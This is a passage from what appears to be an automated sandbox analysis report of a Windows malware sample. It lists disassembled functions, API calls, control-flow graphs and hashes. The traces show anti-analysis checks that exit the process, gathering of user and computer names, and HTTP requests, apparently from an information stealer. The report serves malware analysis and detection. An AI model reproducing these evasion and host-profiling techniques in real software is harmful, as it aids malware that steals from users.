                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3630751533-2791005934
                                                  • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                  • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                                                  Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                  • wsprintfA.USER32 ref: 00417640
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\
                                                  • API String ID: 3790021787-3809124531
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                                                  Function 02F0003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1344 2f0003c-2f00047 1345 2f00049 1344->1345 1346 2f0004c-2f00263 call 2f00a3f call 2f00e0f call 2f00d90 VirtualAlloc 1344->1346 1345->1346 1361 2f00265-2f00289 call 2f00a69 1346->1361 1362 2f0028b-2f00292 1346->1362 1366 2f002ce-2f003c2 VirtualProtect call 2f00cce call 2f00ce7 1361->1366 1364 2f002a1-2f002b0 1362->1364 1365 2f002b2-2f002cc 1364->1365 1364->1366 1365->1364 1373 2f003d1-2f003e0 1366->1373 1374 2f003e2-2f00437 call 2f00ce7 1373->1374 1375 2f00439-2f004b8 VirtualFree 1373->1375 1374->1373 1377 2f005f4-2f005fe 1375->1377 1378 2f004be-2f004cd 1375->1378 1379 2f00604-2f0060d 1377->1379 1380 2f0077f-2f00789 1377->1380 1382 2f004d3-2f004dd 1378->1382 1379->1380 1383 2f00613-2f00637 1379->1383 1385 2f007a6-2f007b0 1380->1385 1386 2f0078b-2f007a3 1380->1386 1382->1377 1387 2f004e3-2f00505 LoadLibraryA 1382->1387 1392 2f0063e-2f00648 1383->1392 1388 2f007b6-2f007cb 1385->1388 1389 2f0086e-2f008be LoadLibraryA 1385->1389 1386->1385 1390 2f00517-2f00520 1387->1390 1391 2f00507-2f00515 1387->1391 1393 2f007d2-2f007d5 1388->1393 1400 2f008c7-2f008f9 1389->1400 1394 2f00526-2f00547 1390->1394 1391->1394 1392->1380 1395 2f0064e-2f0065a 1392->1395 1396 2f00824-2f00833 1393->1396 1397 2f007d7-2f007e0 1393->1397 1398 2f0054d-2f00550 1394->1398 1395->1380 1399 2f00660-2f0066a 1395->1399 1406 2f00839-2f0083c 1396->1406 1401 2f007e2 1397->1401 1402 2f007e4-2f00822 1397->1402 1403 2f005e0-2f005ef 1398->1403 1404 2f00556-2f0056b 1398->1404 1405 2f0067a-2f00689 1399->1405 1407 2f00902-2f0091d 1400->1407 1408 2f008fb-2f00901 1400->1408 1401->1396 1402->1393 1403->1382 1409 2f0056d 1404->1409 1410 2f0056f-2f0057a 1404->1410 1411 2f00750-2f0077a 1405->1411 1412 2f0068f-2f006b2 1405->1412 1406->1389 1413 2f0083e-2f00847 1406->1413 1408->1407 1409->1403 1415 2f0059b-2f005bb 1410->1415 1416 2f0057c-2f00599 1410->1416 1411->1392 1417 2f006b4-2f006ed 1412->1417 1418 2f006ef-2f006fc 1412->1418 1419 2f00849 1413->1419 1420 2f0084b-2f0086c 1413->1420 1427 2f005bd-2f005db 1415->1427 1416->1427 1417->1418 1421 2f0074b 1418->1421 1422 2f006fe-2f00748 1418->1422 1419->1389 1420->1406 1421->1405 1422->1421 1427->1398
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02F0024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 0f69fa3b09fe25b87bf24f3d4cc93b20ceab391222479f3d0b240f39a584ccac
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 1D525B75A01229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB391DB30AA95DF14
                                                  Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E40), ref: 004198A1
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E28), ref: 004198BA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17EB8), ref: 004198D2
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E58), ref: 004198EA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E70), ref: 00419903
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D45BF0), ref: 0041991B
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D12480), ref: 00419933
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D12300), ref: 0041994C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E88), ref: 00419964
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17EA0), ref: 0041997C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17ED0), ref: 00419995
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E10), ref: 004199AD
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D12320), ref: 004199C5
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D45FF8), ref: 004199DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 3511611419-0
                                                  • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                  • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                                                  Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                  • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95
                                                  Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                  • __aulldiv.LIBCMT ref: 00401258
                                                  • __aulldiv.LIBCMT ref: 00401266
                                                  • ExitProcess.KERNEL32 ref: 00401294
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                                  Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1516 416af5-416b04 CloseHandle Sleep 1510->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1510->1517 1516->1508 1517->1511
                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  • String ID:
                                                  • API String ID: 941982115-0
                                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                  Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                  • String ID: ERROR$ERROR
                                                  • API String ID: 3287882509-2579291623
                                                  • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                  • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                  Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocComputerNameProcess
                                                  • String ID:
                                                  • API String ID: 4203777966-0
                                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                  Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                  • ExitProcess.KERNEL32 ref: 00401143
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                  • String ID:
                                                  • API String ID: 1103761159-0
                                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                  Function 02D19D76 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D19D9E
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02D19DBE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D19000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2d19000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: bb056e6c7b6f609ab2e3c09b400357096893d3e07463f0a59642f21edeae7806
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 3CF062325007117BD7207AB9BCACBEA76E8AF4A635F100528E647919C0DB70FC458A61
                                                  Function 02F00E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,02F00223,?,?), ref: 02F00E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,02F00223,?,?), ref: 02F00E1E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: 45d8b9413bf6cb67591f2084faf88883303e7dd66208303ca186fed5f74efe4f
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 5CD01232645228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4046EA
                                                  Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
